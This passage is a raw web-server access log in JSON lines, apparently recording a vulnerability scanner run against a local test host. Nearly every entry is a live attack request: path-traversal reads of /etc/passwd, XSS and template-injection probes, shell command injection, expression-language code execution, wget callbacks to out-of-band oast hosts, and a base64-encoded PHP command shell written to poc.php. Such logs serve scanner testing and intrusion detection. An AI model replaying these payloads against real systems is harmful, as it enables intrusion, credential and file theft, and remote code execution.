+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c9v8hs0smpv8c6ag07h08ejrbb116cjtq.oast.online%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27297MdtX92nxQcpaajMAbahe4Scc%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /echo-server.html?code=test&state=http://www.attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=c9v8hn0smpv8c57g0t007ys7bireadgyx.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"&uid=10; wget http://c9v8hn0smpv8c57g0t00675u64xhjqwik.oast.live","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"&act=sync&task_number=1;wget http://c9v8hn0smpv8c57g0t00rbughqkkehhm6.oast.live","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=c9v8hn0smpv8c57g0t007phcayw6d7ofi.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=c9v8hn0smpv8c57g0t00tn31pcppgrzeb.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Upload/test/test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /EMSWebClient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webconsole/webpages/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Administrator\x0D\x0A Administrator\x0D\x0A bi\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/services/XMLPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ 